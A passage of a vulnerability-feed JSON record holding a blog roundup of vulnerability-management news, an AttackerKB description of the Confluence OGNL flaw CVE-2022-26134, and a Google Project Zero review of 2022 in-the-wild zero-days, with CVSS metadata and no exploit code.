sophisticated and novel techniques, like the attack on SolarWinds, and others exploit simple vulnerabilities in commonly used programs like Windows. Thankfully, there's some basic cyber hygiene strategies that can keep your organization sufficiently prepared to mitigate zero-day exploits.\n\n 1. Ensure that the technology your organization has is sufficient for protecting from the unknown. Many zero-days may never hit a hard drive, so pointing threat detection tools there could be fruitless.\n 2. Patching is integral to protection against exploits. Staying on top of guidance from industry organizations like International Information System Security Certification Consortium (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency is a good way to prioritize the exploit.\n 3. Zero-day exploits are those that the vendor doesn't know exist, and therefore no patch is available. In some cases, protection technologies can use behavioral detections to block certain activities, while in other cases, using detection technologies or human expertise in a security operations center is the only defense. Investing in the human element of security will place an organization in the best position to limit the financial and data losses zero-days can incur.\n\nWhile patching is proper preparation, the investment in trained security professionals, in-house or outsourced, is the best defense against zero-days.\n\n_In general, I agree with everything. My opinion: while critical known vulnerabilities are not fixed promptly, it is premature to think about Zero-Days. And of course, dealing with Zero-Days is primarily the task of the SOC._\n\n# VM vendors write about Vulnerability Management\n\n_I would like to start here with an article with a provocative title_\n\n##  "Why We're Getting Vulnerability Management Wrong" by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/why-we-re-getting-vulnerability-management-wrong>)\n\n_The article was written by Liran Tancman, CEO of Rezilion, a platform vendor that allows you to map, validate and eliminate software vulnerabilities._\n\nSometimes, too much information is a mixed blessing. Security teams use multiple vulnerability scanners in an attempt to cope with a significant rise in both attack surface diversity and software vulnerabilities. But they soon find themselves overwhelmed with results, which leads to a growing backlog of bugs that need to be fixed.\n\n[A recent analysis from RAND Corporation](<https://weis2019.econinfosec.org/wp-content/uploads/sites/6/2019/05/WEIS_2019_paper_53.pdf>) found no notable reduction of breaches in organizations with mature vulnerability management programs.\n\n_By the way, an interesting study, it would be right to give it a separate episode, I guess. Leave a comment if you'd like it._\n\n[Rezilion's own runtime research analysis](<https://www.rezilion.com/runtime-analysis-research/>) finds, on average, only 15% of discovered vulnerabilities are loaded into memory, which makes them exploitable. That means, on average, only 15% of flaws require priority patching \u2014 or patching at all. \n\n_Also an interesting topic that deserves a separate episode._\n\nRezilion conducted an analysis of 20 of the most popular container images. The findings showed more than 4,347 known vulnerabilities. 75% of those rated as critical or high in severity did not load to memory and posed no risk. Organizations can use runtime analysis to prioritize remediation of vulnerabilities. A vulnerability in a package that isn't being loaded to memory can't be exploited by an attacker.\n\n_This is a long-standing dispute: is it necessary to fix vulnerabilities in software that is not running at the moment? Well, usually the answer is yes, it is necessary. Because no one can guarantee that the software will suddenly not be launched. But if it is possible to identify vulnerabilities in software that is currently running or was launched not so long ago, then this is a good source of data for additional prioritization. Why not. It's good that Rezilion highlights this._\n\n##  "Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0" by [Qualys](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n_To tell the truth, I have long been interested in what's new in Qualys Vulnerability Management, Detection and Response._\n\nAccording to the recently released Verizon DBIR report, vulnerability exploitation continued to be one of the top three attack vectors exploited by bad actors in 2021 to break into organizations. As of this writing, it\u2019s only June, but more than 10,000 vulnerabilities have already been disclosed in 2022, according to the National Vulnerability Database (NVD). As if that weren\u2019t bad enough, the rate of increase of ransomware attacks last year was more than the last five years combined.\n\n 1. The resources required to patch all these vulnerabilities have not kept up with the pace at which vulnerabilities are disclosed and exploited.\n 2. The correct remediation path is not always straightforward. In some cases, patching a vulnerability can require deploying a patch, making a configuration change, or both.\n\nAll these introduce delays in the remediation process.\n\nQualys VMDR 2.0 introduces TruRisk scores that help organizations prioritize vulnerabilities based on risk ratings that weigh multiple factors such as exploit code maturity, exploitation in the wild, and multiple other factors that accurately measure risk.\n\n_In general, it looks like Tenable vulnerability priority rating (VPR). It's probably generated the same way. But the technical details of TruRisk are not given here._\n\nA key step in any remediation workflow is good communication between the vulnerability management (VM) team and the remediation team. However, these two teams use different products and different terminology. The VM team understands the risk and QIDs. The remediation team understands patches. Qualys maps the selected vulnerabilities to the right patches and configuration changes required to remediate them specific to the organization\u2019s unique environment. For some assets, this entire process can be automated with VMDR 2.0. For example, a zero-touch automation job can be created to patch non-mission critical assets that will automatically execute as soon as a new vulnerability with a Qualys Detection Score >90 is detected.\n\nIntegrated Patch Management is Simply Faster. On average, organizations that use Qualys VMDR + Patch Management remediate vulnerabilities 35% faster than organizations that use separate tools. Even better, with some vulnerabilities the difference can be 63% faster with a combined solution.\n\n_I agree that the focus of the VM should be on Remediation and it's good that Qualys is pushing this topic. Is there enough new features to call this update VMDR 2.0? I don't think so yet. It seems that if Remediation were fully automated for 100% of the hosts (which requires a fundamentally different approach to functional testing after the patch), then it would be 2.0. But marketers of Qualys know better._\n\n##  "Modern IT Security Teams\u2019 Inevitable Need for Advanced Vulnerability Management" by [Threatpost](<https://threatpost.com/modern-it-security-teams-inevitable-need-for-advanced-vulnerability-management/180018/>) (sponsored by Secpod)\n\nToday\u2019s modern attack surface needs a next-gen, advanced vulnerability management approach to deal with the complex, ever-evolving attack surfaces and to curb cyberattacks. Why Conventional Vulnerability Management is not the Best-fit for Modern Security Landscape\n\n 1. Vulnerabilities beyond CVEs are overlooked. Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.\n 2. Lack of integrated remediation controls. Most of the traditional vulnerability management tools in the market do not come with integrated patching to remediate vulnerabilities. Conventional vulnerability management solutions rely on multiple tools to execute each step, making it hard for IT security teams.\n 3. Siloed Interfaces and Multiple-point Solutions Approach. Conventional vulnerability management solutions rely on multiple tools to execute each step, making it hard for IT security teams.\n 4. Manual Methods and Repetitive Processes. Traditional Vulnerability management tools are still not fully automated.\n\n_And to overcome these issues, you need Advanced Vulnerability Management from Secpod. In general, the list of cons looks fair, and the fact that they pay attention to vulnerabilities in addition to CVEs seems to me very correct._\n\n# de-Westernization of IT\n\nI have nothing against people or companies from Western countries. According to Google analytics, the majority of visitors to my [avleonov.com](<http://avleonov.com>) blog are actually from the US (then India, China, and Russia). However, that's how it goes. Some companies stop working in Russia because of the sanctions. And Russian information security specialists should take into account these risks, mitigate them and warn colleagues who may also face these problems.\n\nLast week there was news that SAP and Microsoft will block Russian companies' access to software updates, including security updates, in August. For some reason, the news was published in Bloomberg without reference to the source.\n\n> "It's not just industry that's affected. SAP SE and Microsoft Corp. are due to stop updates and services for Russian companies in August, leaving businesses and government services that rely on their software potentially vulnerable to security breaches and viruses."\n\nSome time later, this paragraph was rewritten. The mention of August was removed. Unfortunately, the fact that the leading Western media are spreading propaganda and rumors is no longer surprising. I do not even want to give a link to the article, whoever is interested can google it on their own.\n\nHowever, what if this really happens? What if we can no longer use WSUS and SCCM to update the Windows infrastructure? And even more, if we get some malicious functionality in the updates, which will be activated over time. Unfortunately, what once seemed like a minor risk and paranoia is now becoming more than real. Therefore, we need to think in advance about network isolation, alternative ways to update the Windows infrastructure, implement control over backups, implement information security tools that could compensate for the lack of patches to some extent. And most importantly, we need to quickly reduce dependence on the software of unstable vendors. And this is now relevant not only for Russia, but also for the BRICS countries and other countries that are already under US sanctions or may potentially face them.\n\n* * *\n\nI also finally decided to launch a Russian-language telegram channel ["\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435" @avleonovrus](<https://t.me/avleonovrus>). I think it will be updated a little more often, and there will be more reactions to our local Russian topics. Therefore, those who are interested, subscribe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T12:13:56", "type": "avleonov", "title": "Vulnerability Management news and publications #1", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-07-06T12:13:56", "id": "AVLEONOV:E820C062BC9959711E1D1152D8848072", "href": "https://avleonov.com/2022/07/06/vulnerability-management-news-and-publications-1/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-08-03T22:59:55", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection that is trivial to exploit. See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2022-06-30T13:56:58", "description": "Posted by Maddie Stone, Google Project Zero\n\nThis blog post is an overview of a talk, \u201c 0-day In-the-Wild Exploitation in 2022\u2026so far\u201d, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nFor the last three years, we\u2019ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we\u2019re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022. \n\nAs of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we\u2019ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug. \n\nProduct\n\n| \n\n2022 ITW 0-day\n\n| \n\nVariant \n \n---|---|--- \n \nWindows win32k\n\n| \n\n[CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>)\n\n| \n\n[CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) \n \niOS IOMobileFrameBuffer\n\n| \n\n[CVE-2022-22587](<https://support.apple.com/en-us/HT213053>)\n\n| \n\n[CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) \n \nWindows\n\n| \n\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (\u201cFollina\u201d)\n\n| \n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) \n \nChromium property access interceptors\n\n| \n\n[CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>)\n\n| \n\n[CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>) [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw) [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (Addresses incomplete CVE-2022-1096 fix) \n \nChromium v8\n\n| \n\n[CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>)\n\n| \n\n[CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) \n \nWebKit\n\n| \n\n[CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (\u201cZombie\u201d)\n\n| \n\n[Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) \n \nGoogle Pixel\n\n| \n\n[CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)*\n\n* While this CVE says 2021, the bug was patched and disclosed in 2022\n\n| \n\n[Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) \n \nAtlassian Confluence\n\n| \n\n[CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)\n\n| \n\n[CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) \n \nWindows\n\n| \n\n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (\u201cPetitPotam\u201d)\n\n| \n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (Patch regressed) \n \nSo, what does this mean?\n\nWhen people think of 0-day exploits, they often think that these exploits are so technologically advanced that there\u2019s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we\u2019ve seen so far this year are closely related to bugs we\u2019ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.\n\nMany of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn\u2019t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.\n\nThis is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report: \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. \n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nPractically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:\n\n * Root cause analysis\n\nUnderstanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.\n\n * Variant analysis\n\nLooking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn\u2019t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply \u201cplug and play\u201d with a new vulnerability once the original is patched.\n\n * Patch analysis\n\nAnalyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor\u2019s own internal analysis.\n\n * Exploit technique analysis\n\nUnderstanding the primitive gained from the vulnerability and how it\u2019s being used. While it\u2019s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn\u2019t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.\n\nTransparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "googleprojectzero", "title": "\n2022 0-day In-the-Wild Exploitation\u2026so far\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", "CVE-2022-30190"], "modified": "2022-06-30T00:00:00", "id": "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "href": "https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Exploit for Injection in Atlassian Confluence Data Center
